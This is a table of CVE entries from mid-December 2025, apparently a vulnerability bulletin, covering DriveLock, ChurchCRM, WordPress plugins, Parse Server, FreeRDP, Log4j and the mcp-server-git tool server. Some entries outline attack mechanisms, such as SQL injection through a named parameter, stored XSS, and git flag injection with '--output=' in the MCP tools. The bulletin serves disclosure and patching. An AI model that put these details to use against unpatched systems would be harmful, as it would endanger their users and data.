| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 before 24.1.6, 24.2 before 24.2.7, and 25.1 before 25.1.5. An unprivileged user could cause occasionally a Blue Screen Of Death (BSOD) on Windows computers by using an IOCTL and an unterminated string. | 2025-12-17 | not yet calculated | CVE-2025-67790 | https://drivelock.help/versions/2025_1/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-005-BufferOverreadBSOD.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 through 24.1.*, 24.2 through 24.2.*, and 25.1 through 25.1.*. An incomplete configuration (agent authentication) in DriveLock tenant allows attackers to impersonate any DriveLock agent on the network against the DES (DriveLock Enterprise Service). | 2025-12-17 | not yet calculated | CVE-2025-67791 | https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-006-DESMisconfig.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 before 24.1.6, 24.2 before 24.2.7, and 25.1 before 25.1.5. Local unprivileged users can manipulate a DriveLock process to execute arbitrary commands on Windows computers. | 2025-12-17 | not yet calculated | CVE-2025-67792 | https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-007-LocalPrivilegeEsc.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 through 24.1.*, 24.2 through 24.2.*, and 25.1 before 25.1.6. Users with the "Manage roles and permissions" privilege can promote themselves or other DOC users to the Supervisor role through an API call. This privilege is included by default in the Administrator role. This issue mainly affects cloud multi-tenant deployments; on-prem single-tenant installations are typically not impacted because local admins usually already have Supervisor privileges. | 2025-12-17 | not yet calculated | CVE-2025-67793 | https://drivelock.help/sb/Content/SecurityBulletins/25-008-DESPrivilegeEsc.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 through 24.1.*, 24.2 before 24.2.8, and 25.1 before 25.1.6. Directories and files created by the agent are created with overly permissive ACLs, allowing local users without administrator rights to trigger actions or destabilize the agent. | 2025-12-17 | not yet calculated | CVE-2025-67794 | https://drivelock.help/sb/Content/SecurityBulletins/25-009-AgIncPermissions.htm |
| Zimbra--Zimbra | An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. A hardcoded Flickr API key and secret are present in the publicly accessible Flickr Zimlet used by Zimbra Collaboration. Because these credentials are embedded directly in the Zimlet, any unauthorized party could retrieve them and misuse the Flickr integration. An attacker with access to the exposed credentials could impersonate the legitimate application and initiate valid Flickr OAuth flows. If a user is tricked into approving such a request, the attacker could gain access to the user s Flickr data. The hardcoded credentials have since been removed from the Zimlet code, and the associated key has been revoked. | 2025-12-15 | not yet calculated | CVE-2025-67809 | https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.0, the application echoes back plaintext passwords submitted by users in subsequent HTTP responses. This information disclosure significantly increases the risk of credential compromise and may amplify the impact of other vulnerabilities (e.g., XSS, IDOR, session fixation), enabling attackers to harvest other users' passwords. Version 6.5.0 fixes the issue. | 2025-12-16 | not yet calculated | CVE-2025-67874 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-p98h-5xcj-5c6x https://github.com/ChurchCRM/CRM/commit/2d6cf7aed9af1b9b47e125d1a2266f8e2a88f3fd |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. A privilege escalation vulnerability exists in ChurchCRM prior to version 6.5.3. An authenticated user with specific mid-level permissions ("Edit Records" and "Manage Properties and Classifications") can inject a persistent Cross-Site Scripting (XSS) payload into an administrator's profile. The payload executes when the administrator views their own profile page, allowing the attacker to hijack the administrator's session, perform administrative actions, and achieve a full account takeover. This vulnerability is a combination of two separate flaws: an Insecure Direct Object Reference (IDOR) that allows any user to view any other user's profile, and a Broken Access Control vulnerability that allows a user with general edit permissions to modify any other user's record properties. Version 6.5.3 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-67875 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-fcw7-mmfh-7vjm |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM versions 6.4.0 and prior that allows a low-privilege user with the "Manage Groups" permission to inject persistent JavaScript into group role names. The payload is saved in the database and executed whenever any user (including administrators) views a page that displays that role, such as GroupView.php or PersonView.php. This allows full session hijacking and account takeover. As of time of publication, no known patched versions are available. | 2025-12-17 | not yet calculated | CVE-2025-67876 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Versions prior to 6.5.3 have a SQL injection vulnerability in the `src/CartToFamily.php` file, specifically in how the `PersonAddress` POST parameter is handled. Unlike other parameters in the same file which are correctly cast to integers using the `InputUtils` class, the `PersonAddress` parameter is missing the type definition. This allows an attacker to inject arbitrary SQL commands directly into the query. Version 6.5.3 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-67877 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-h3vq-9gr6-h9r4 |
| Apache Software Foundation--Apache Airflow Providers Edge3 | Edge3 Worker RPC RCE on Airflow 2. This issue affects Apache Airflow Providers Edge3: before 2.0.0 - and only if you installed and configured it on Airflow 2. The Edge3 provider support in Airflow 2 has been always development-only and not officially released, however if you installed and configured Edge3 provider in Airflow 2, it implicitly enabled non-public (normally) API which was used to test Edge Provider in Airflow 2 during the development. This API allowed Dag author to perform Remote Code Execution in the webserver context, which Dag Author was not supposed to be able to do. If you installed and configured Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider versions (>=2.0.0) has minimum version of Airflow set to 3 and the RCE-prone Airflow 2 code is removed, so it should no longer be possible to use the Edge3 provider 2.0.0+ on Airflow 2. If you used Edge Provider in Airflow 3, you are not affected. | 2025-12-17 | not yet calculated | CVE-2025-67895 | https://github.com/apache/airflow/pull/59143 https://lists.apache.org/thread/hhnmmzkj5qx5gbk6pdkh8tcsx5oj1nqs |
| Gal Dubinski--Stars Testimonials | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gal Dubinski Stars Testimonials stars-testimonials-with-slider-and-masonry-grid allows Stored XSS.This issue affects Stars Testimonials: from n/a through <= 3.3.4. | 2025-12-16 | not yet calculated | CVE-2025-67912 | https://vdp.patchstack.com/database/Wordpress/Plugin/stars-testimonials-with-slider-and-masonry-grid/vulnerability/wordpress-stars-testimonials-plugin-3-3-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| templateinvaders--TI WooCommerce Wishlist | Missing Authorization vulnerability in templateinvaders TI WooCommerce Wishlist ti-woocommerce-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TI WooCommerce Wishlist: from n/a through <= 2.10.0. | 2025-12-16 | not yet calculated | CVE-2025-67929 | https://vdp.patchstack.com/database/Wordpress/Plugin/ti-woocommerce-wishlist/vulnerability/wordpress-ti-woocommerce-wishlist-plugin-2-10-0-broken-access-control-vulnerability-2?_s_id=cve |
| SendPulse--SendPulse Email Marketing Newsletter | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in SendPulse SendPulse Email Marketing Newsletter sendpulse-email-marketing-newsletter allows Retrieve Embedded Sensitive Data.This issue affects SendPulse Email Marketing Newsletter: from n/a through <= 2.2.1. | 2025-12-16 | not yet calculated | CVE-2025-67948 | https://vdp.patchstack.com/database/Wordpress/Plugin/sendpulse-email-marketing-newsletter/vulnerability/wordpress-sendpulse-email-marketing-newsletter-plugin-2-2-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| Syed Balkhi--All In One SEO Pack | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Syed Balkhi All In One SEO Pack all-in-one-seo-pack allows Blind SQL Injection.This issue affects All In One SEO Pack: from n/a through <= 4.9.1. | 2025-12-16 | not yet calculated | CVE-2025-67950 | https://vdp.patchstack.com/database/Wordpress/Plugin/all-in-one-seo-pack/vulnerability/wordpress-all-in-one-seo-pack-plugin-4-9-1-sql-injection-vulnerability?_s_id=cve |
| WPZOOM--WPZOOM Addons for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM WPZOOM Addons for Elementor wpzoom-elementor-addons allows DOM-Based XSS.This issue affects WPZOOM Addons for Elementor: from n/a through <= 1.2.10. | 2025-12-16 | not yet calculated | CVE-2025-67951 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpzoom-elementor-addons/vulnerability/wordpress-wpzoom-addons-for-elementor-plugin-1-2-10-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AIOSEO Plugin Team--Broken Link Checker | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AIOSEO Plugin Team Broken Link Checker broken-link-checker-seo allows SQL Injection.This issue affects Broken Link Checker: from n/a through <= 1.2.6. | 2025-12-16 | not yet calculated | CVE-2025-67962 | https://vdp.patchstack.com/database/Wordpress/Plugin/broken-link-checker-seo/vulnerability/wordpress-broken-link-checker-plugin-1-2-6-sql-injection-vulnerability?_s_id=cve |
| favethemes--Homey Core | Missing Authorization vulnerability in favethemes Homey Core homey-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Homey Core: from n/a through <= 2.4.3. | 2025-12-16 | not yet calculated | CVE-2025-67965 | https://vdp.patchstack.com/database/Wordpress/Plugin/homey-core/vulnerability/wordpress-homey-core-plugin-2-4-3-broken-access-control-vulnerability?_s_id=cve |
| Bob--Watu Quiz | Missing Authorization vulnerability in Bob Watu Quiz watu allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Watu Quiz: from n/a through <= 3.4.5. | 2025-12-16 | not yet calculated | CVE-2025-67976 | https://vdp.patchstack.com/database/Wordpress/Plugin/watu/vulnerability/wordpress-watu-quiz-plugin-3-4-5-broken-access-control-vulnerability?_s_id=cve |
| osama.esh--WP Visitor Statistics (Real Time Traffic) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in osama.esh WP Visitor Statistics (Real Time Traffic) wp-stats-manager allows DOM-Based XSS.This issue affects WP Visitor Statistics (Real Time Traffic): from n/a through <= 8.3. | 2025-12-16 | not yet calculated | CVE-2025-67983 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-stats-manager/vulnerability/wordpress-wp-visitor-statistics-real-time-traffic-plugin-8-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Barn2 Plugins--Document Library Lite | Authorization Bypass Through User-Controlled Key vulnerability in Barn2 Plugins Document Library Lite document-library-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Document Library Lite: from n/a through <= 1.1.7. | 2025-12-16 | not yet calculated | CVE-2025-67985 | https://vdp.patchstack.com/database/Wordpress/Plugin/document-library-lite/vulnerability/wordpress-document-library-lite-plugin-1-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Barn2 Plugins--Document Library Lite | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Barn2 Plugins Document Library Lite document-library-lite allows DOM-Based XSS.This issue affects Document Library Lite: from n/a through <= 1.1.7. | 2025-12-16 | not yet calculated | CVE-2025-67986 | https://vdp.patchstack.com/database/Wordpress/Plugin/document-library-lite/vulnerability/wordpress-document-library-lite-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LMPixels--Kerge | Server-Side Request Forgery (SSRF) vulnerability in LMPixels Kerge kerge allows Server Side Request Forgery.This issue affects Kerge: from n/a through <= 4.1.3. | 2025-12-16 | not yet calculated | CVE-2025-67989 | https://vdp.patchstack.com/database/Wordpress/Theme/kerge/vulnerability/wordpress-kerge-theme-4-1-3-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Stefano Lissa--Newsletter | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Stefano Lissa Newsletter newsletter allows Blind SQL Injection.This issue affects Newsletter: from n/a through <= 9.0.9. | 2025-12-16 | not yet calculated | CVE-2025-67999 | https://vdp.patchstack.com/database/Wordpress/Plugin/newsletter/vulnerability/wordpress-newsletter-plugin-9-0-9-sql-injection-vulnerability?_s_id=cve |
| LambertGroup--xPromoter | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup xPromoter top_bar_promoter allows Blind SQL Injection.This issue affects xPromoter: from n/a through <= 1.3.4. | 2025-12-16 | not yet calculated | CVE-2025-68053 | https://vdp.patchstack.com/database/Wordpress/Plugin/top_bar_promoter/vulnerability/wordpress-xpromoter-plugin-1-3-4-sql-injection-vulnerability?_s_id=cve |
| LambertGroup--CountDown With Image or Video Background | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup CountDown With Image or Video Background countdown_with_background allows Blind SQL Injection.This issue affects CountDown With Image or Video Background: from n/a through <= 1.5. | 2025-12-16 | not yet calculated | CVE-2025-68054 | https://vdp.patchstack.com/database/Wordpress/Plugin/countdown_with_background/vulnerability/wordpress-countdown-with-image-or-video-background-plugin-1-5-sql-injection-vulnerability?_s_id=cve |
| Themefic--Hydra Booking | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Hydra Booking hydra-booking allows SQL Injection.This issue affects Hydra Booking: from n/a through <= 1.1.32. | 2025-12-16 | not yet calculated | CVE-2025-68055 | https://vdp.patchstack.com/database/Wordpress/Plugin/hydra-booking/vulnerability/wordpress-hydra-booking-plugin-1-1-32-sql-injection-vulnerability?_s_id=cve |
| LambertGroup--LBG Zoominoutslider | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup LBG Zoominoutslider lbg_zoominoutslider allows SQL Injection.This issue affects LBG Zoominoutslider: from n/a through <= 5.4.5. | 2025-12-16 | not yet calculated | CVE-2025-68056 | https://vdp.patchstack.com/database/Wordpress/Plugin/lbg_zoominoutslider/vulnerability/wordpress-lbg-zoominoutslider-plugin-5-4-5-sql-injection-vulnerability?_s_id=cve |
| ThemeMove--EduMall | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove EduMall edumall allows PHP Local File Inclusion.This issue affects EduMall: from n/a through <= 4.4.7. | 2025-12-16 | not yet calculated | CVE-2025-68061 | https://vdp.patchstack.com/database/Wordpress/Theme/edumall/vulnerability/wordpress-edumall-theme-4-4-7-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--MinimogWP | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove MinimogWP minimog allows PHP Local File Inclusion.This issue affects MinimogWP: from n/a through <= 3.9.6. | 2025-12-16 | not yet calculated | CVE-2025-68062 | https://vdp.patchstack.com/database/Wordpress/Theme/minimog/vulnerability/wordpress-minimogwp-theme-3-9-6-local-file-inclusion-vulnerability?_s_id=cve |
| LiquidThemes--Hub Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in LiquidThemes Hub Core hub-core allows PHP Local File Inclusion.This issue affects Hub Core: from n/a through <= 5.0.8. | 2025-12-16 | not yet calculated | CVE-2025-68065 | https://vdp.patchstack.com/database/Wordpress/Plugin/hub-core/vulnerability/wordpress-hub-core-plugin-5-0-8-local-file-inclusion-vulnerability?_s_id=cve |
| PenciDesign--Soledad | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in PenciDesign Soledad soledad allows PHP Local File Inclusion.This issue affects Soledad: from n/a through <= 8.7.0. | 2025-12-16 | not yet calculated | CVE-2025-68066 | https://vdp.patchstack.com/database/Wordpress/Theme/soledad/vulnerability/wordpress-soledad-theme-8-7-0-local-file-inclusion-vulnerability?_s_id=cve |
| Select-Themes--Stockholm Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Stockholm Core stockholm-core allows PHP Local File Inclusion.This issue affects Stockholm Core: from n/a through <= 2.4.6. | 2025-12-16 | not yet calculated | CVE-2025-68067 | https://vdp.patchstack.com/database/Wordpress/Plugin/stockholm-core/vulnerability/wordpress-stockholm-core-plugin-2-4-6-local-file-inclusion-vulnerability?_s_id=cve |
| Select-Themes--Stockholm | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Stockholm stockholm allows PHP Local File Inclusion.This issue affects Stockholm: from n/a through <= 9.14.1. | 2025-12-16 | not yet calculated | CVE-2025-68068 | https://vdp.patchstack.com/database/Wordpress/Theme/stockholm/vulnerability/wordpress-stockholm-theme-9-14-1-local-file-inclusion-vulnerability?_s_id=cve |
| Vektor,Inc.--VK Google Job Posting Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vektor,Inc. VK Google Job Posting Manager vk-google-job-posting-manager allows Stored XSS.This issue affects VK Google Job Posting Manager: from n/a through <= 1.2.21. | 2025-12-16 | not yet calculated | CVE-2025-68070 | https://vdp.patchstack.com/database/Wordpress/Plugin/vk-google-job-posting-manager/vulnerability/wordpress-vk-google-job-posting-manager-plugin-1-2-21-cross-site-scripting-xss-vulnerability?_s_id=cve |
| g5theme--Essential Real Estate | Authorization Bypass Through User-Controlled Key vulnerability in g5theme Essential Real Estate essential-real-estate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Real Estate: from n/a through <= 5.2.2. | 2025-12-16 | not yet calculated | CVE-2025-68071 | https://vdp.patchstack.com/database/Wordpress/Plugin/essential-real-estate/vulnerability/wordpress-essential-real-estate-plugin-5-2-2-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Select-Themes--Stockholm Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Select-Themes Stockholm Core stockholm-core allows Stored XSS.This issue affects Stockholm Core: from n/a through <= 2.4.6. | 2025-12-16 | not yet calculated | CVE-2025-68076 | https://vdp.patchstack.com/database/Wordpress/Plugin/stockholm-core/vulnerability/wordpress-stockholm-core-plugin-2-4-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Select-Themes--Stockholm | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Select-Themes Stockholm stockholm allows Stored XSS.This issue affects Stockholm: from n/a through <= 9.14.1. | 2025-12-16 | not yet calculated | CVE-2025-68077 | https://vdp.patchstack.com/database/Wordpress/Theme/stockholm/vulnerability/wordpress-stockholm-theme-9-14-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeNectar--Salient Portfolio | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNectar Salient Portfolio salient-portfolio allows Stored XSS.This issue affects Salient Portfolio: from n/a through <= 1.8.2. | 2025-12-16 | not yet calculated | CVE-2025-68078 | https://vdp.patchstack.com/database/Wordpress/Theme/salient-portfolio/vulnerability/wordpress-salient-portfolio-theme-1-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeNectar--Salient Shortcodes | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNectar Salient Shortcodes salient-shortcodes allows Stored XSS.This issue affects Salient Shortcodes: from n/a through <= 1.5.4. | 2025-12-16 | not yet calculated | CVE-2025-68079 | https://vdp.patchstack.com/database/Wordpress/Plugin/salient-shortcodes/vulnerability/wordpress-salient-shortcodes-plugin-1-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Saad Iqbal--User Avatar - Reloaded | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saad Iqbal User Avatar - Reloaded user-avatar-reloaded allows Stored XSS.This issue affects User Avatar - Reloaded: from n/a through <= 1.2.2. | 2025-12-16 | not yet calculated | CVE-2025-68080 | https://vdp.patchstack.com/database/Wordpress/Plugin/user-avatar-reloaded/vulnerability/wordpress-user-avatar-reloaded-plugin-1-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SEMrush CY LTD--Semrush Content Toolkit | Cross-Site Request Forgery (CSRF) vulnerability in SEMrush CY LTD Semrush Content Toolkit semrush-contentshake allows Cross Site Request Forgery.This issue affects Semrush Content Toolkit: from n/a through <= 1.1.32. | 2025-12-16 | not yet calculated | CVE-2025-68082 | https://vdp.patchstack.com/database/Wordpress/Plugin/semrush-contentshake/vulnerability/wordpress-semrush-content-toolkit-plugin-1-1-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Meks--Meks Quick Plugin Disabler | Cross-Site Request Forgery (CSRF) vulnerability in Meks Meks Quick Plugin Disabler meks-quick-plugin-disabler allows Cross Site Request Forgery.This issue affects Meks Quick Plugin Disabler: from n/a through <= 1.0. | 2025-12-16 | not yet calculated | CVE-2025-68083 | https://vdp.patchstack.com/database/Wordpress/Plugin/meks-quick-plugin-disabler/vulnerability/wordpress-meks-quick-plugin-disabler-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Nitesh--Ultimate Auction | Missing Authorization vulnerability in Nitesh Ultimate Auction ultimate-auction allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Auction : from n/a through <= 4.3.2. | 2025-12-16 | not yet calculated | CVE-2025-68084 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-auction/vulnerability/wordpress-ultimate-auction-plugin-4-3-2-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Buttoner for Elementor | Missing Authorization vulnerability in merkulove Buttoner for Elementor buttoner-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Buttoner for Elementor: from n/a through <= 1.0.6. | 2025-12-16 | not yet calculated | CVE-2025-68085 | https://vdp.patchstack.com/database/Wordpress/Plugin/buttoner-elementor/vulnerability/wordpress-buttoner-for-elementor-plugin-1-0-6-settings-change-vulnerability?_s_id=cve |
| merkulove--Reformer for Elementor | Missing Authorization vulnerability in merkulove Reformer for Elementor reformer-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reformer for Elementor: from n/a through <= 1.0.6. | 2025-12-16 | not yet calculated | CVE-2025-68086 | https://vdp.patchstack.com/database/Wordpress/Plugin/reformer-elementor/vulnerability/wordpress-reformer-for-elementor-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Modalier for Elementor | Missing Authorization vulnerability in merkulove Modalier for Elementor modalier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Modalier for Elementor: from n/a through <= 1.0.6. | 2025-12-16 | not yet calculated | CVE-2025-68087 | https://vdp.patchstack.com/database/Wordpress/Plugin/modalier-elementor/vulnerability/wordpress-modalier-for-elementor-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Huger for Elementor | Missing Authorization vulnerability in merkulove Huger for Elementor huger-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Huger for Elementor: from n/a through <= 1.1.5. | 2025-12-16 | not yet calculated | CVE-2025-68088 | https://vdp.patchstack.com/database/Wordpress/Plugin/huger-elementor/vulnerability/wordpress-huger-for-elementor-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. In versions prior to 8.6.1 and 9.1.0-alpha.3, a Reflected Cross-Site Scripting (XSS) vulnerability exists in Parse Server's password reset and email verification HTML pages. The patch, available in versions 8.6.1 and 9.1.0-alpha.3, escapes user controlled values that are inserted into the HTML pages. No known workarounds are available. | 2025-12-16 | not yet calculated | CVE-2025-68115 | https://github.com/parse-community/parse-server/security/advisories/GHSA-jhgf-2h8h-ggxv https://github.com/parse-community/parse-server/pull/9985 https://github.com/parse-community/parse-server/pull/9986 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.20.0, a vulnerability exists in FreeRDP's certificate handling code on Windows platforms. The function `freerdp_certificate_data_hash_ uses` the Microsoft-specific `_snprintf` function to format certificate cache filenames without guaranteeing NUL termination when truncation occurs. According to Microsoft documentation, `_snprintf` does not append a terminating NUL byte if the formatted output exceeds the destination buffer size. If an attacker controls the hostname value (for example via server redirection or a crafted .rdp file), the resulting filename buffer may not be NUL-terminated. Subsequent string operations performed on this buffer may read beyond the allocated memory region, resulting in a heap-based out-of-bounds read. In default configurations, the connection is typically terminated before sensitive data can be meaningfully exposed, but unintended memory read or a client crash may still occur under certain conditions. Version 3.20.0 has a patch for the issue. | 2025-12-17 | not yet calculated | CVE-2025-68118 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-h78c-5cjx-jw6x https://github.com/FreeRDP/FreeRDP/commit/a0b21f992a9de1de2468fc9e600aa2b7a4066307 |
| trpc--trpc | tRPC allows users to build and consume fully typesafe APIs without schemas or code generation. Starting in version 10.27.0 and prior to versions 10.45.3 and 11.8.0, a A prototype pollution vulnerability exists in `@trpc/server`'s `formDataToObject` function, which is used by the Next.js App Router adapter. An attacker can pollute `Object.prototype` by submitting specially crafted FormData field names, potentially leading to authorization bypass, denial of service, or other security impacts. Note that this vulnerability is only present when using `experimental_caller` / `experimental_nextAppDirCaller`. Versions 10.45.3 and 11.8.0 fix the issue. | 2025-12-16 | not yet calculated | CVE-2025-68130 | https://github.com/trpc/trpc/security/advisories/GHSA-43p4-m455-4f4j |
| facelessuser--pymdown-extensions | PyMdown Extensions is a set of extensions for the `Python-Markdown` markdown project. Versions prior to 10.16.1 have a ReDOS bug found within the figure caption extension (`pymdownx.blocks.caption`). In systems that take unchecked user content, this could cause long hanges when processing the data if a malicious payload was crafted. This issue is patched in Release 10.16.1. As a workaround, those who process unknown user content without timeouts or other safeguards in place to prevent really large, malicious content being aimed at systems may avoid the use of `pymdownx.blocks.caption` until they're able to upgrade. | 2025-12-16 | not yet calculated | CVE-2025-68142 | https://github.com/facelessuser/pymdown-extensions/security/advisories/GHSA-r6h4-mm7h-8pmq https://github.com/facelessuser/pymdown-extensions/commit/b50d15a56850ed1408a284bba81cc019c6bd72e8 https://pypi.org/project/pymdown-extensions/10.16.1 |
| modelcontextprotocol--servers | Model Context Protocol Servers is a collection of reference implementations for the model context protocol (MCP). In mcp-server-git versions prior to 2025.9.25, the git_init tool accepted arbitrary filesystem paths and created Git repositories without validating the target location. Unlike other tools which required an existing repository, git_init could operate on any directory accessible to the server process, making those directories eligible for subsequent git operations. The tool was removed entirely, as the server is intended to operate on existing repositories only. Users are advised to upgrade to 2025.9.25 or newer to remediate this issue. | 2025-12-17 | not yet calculated | CVE-2025-68143 | https://github.com/modelcontextprotocol/servers/security/advisories/GHSA-5cgr-j3jf-jw3v https://github.com/modelcontextprotocol/servers/commit/eac56e7bcde48fb64d5a973924d05d69a7d876e6 |
| modelcontextprotocol--servers | In mcp-server-git versions prior to 2025.12.17, the git_diff and git_checkout functions passed user-controlled arguments directly to git CLI commands without sanitization. Flag-like values (e.g., `--output=/path/to/file` for `git_diff`) would be interpreted as command-line options rather than git refs, enabling arbitrary file overwrites. The fix adds validation that rejects arguments starting with - and verifies the argument resolves to a valid git ref via rev_parse before execution. Users are advised to update to 2025.12.17 resolve this issue when it is released. | 2025-12-17 | not yet calculated | CVE-2025-68144 | https://github.com/modelcontextprotocol/servers/security/advisories/GHSA-9xwc-hfwc-8w59 |
| modelcontextprotocol--servers | In mcp-server-git versions prior to 2025.12.17, when the server is started with the --repository flag to restrict operations to a specific repository path, it did not validate that repo_path arguments in subsequent tool calls were actually within that configured path. This could allow tool calls to operate on other repositories accessible to the server process. The fix adds path validation that resolves both the configured repository and the requested path (following symlinks) and verifies the requested path is within the allowed repository before executing any git operations. Users are advised to upgrade to 2025.12.17 upon release to remediate this issue. | 2025-12-17 | not yet calculated | CVE-2025-68145 | https://github.com/modelcontextprotocol/servers/security/advisories/GHSA-j22h-9j4x-23w5 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.2 and 9.1.1-alpha.1, the Instagram authentication adapter allows clients to specify a custom API URL via the `apiURL` parameter in `authData`. This enables SSRF attacks and possibly authentication bypass if malicious endpoints return fake responses to validate unauthorized users. This is fixed in versions 8.6.2 and 9.1.1-alpha.1 by hardcoding the Instagram Graph API URL `https://graph.instagram.com` and ignoring client-provided `apiURL` values. No known workarounds are available. | 2025-12-16 | not yet calculated | CVE-2025-68150 | https://github.com/parse-community/parse-server/security/advisories/GHSA-3f5f-xgrj-97pf https://github.com/parse-community/parse-server/pull/9988 https://github.com/parse-community/parse-server/pull/9989 |
| Apache Software Foundation--Apache Log4j Core | The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName configuration attribute or the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property is set to true. This issue may allow a man-in-the-middle attacker to intercept or redirect log traffic under the following conditions: * The attacker is able to intercept or redirect network traffic between the client and the log receiver. * The attacker can present a server certificate issued by a certification authority trusted by the Socket Appender's configured trust store (or by the default Java trust store if no custom trust store is configured). Users are advised to upgrade to Apache Log4j Core version 2.25.3, which addresses this issue. As an alternative mitigation, the Socket Appender may be configured to use a private or restricted trust root to limit the set of trusted certificates. | 2025-12-18 | not yet calculated | CVE-2025-68161 | https://github.com/apache/logging-log4j2/pull/4002 https://logging.apache.org/security.html#CVE-2025-68161 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName 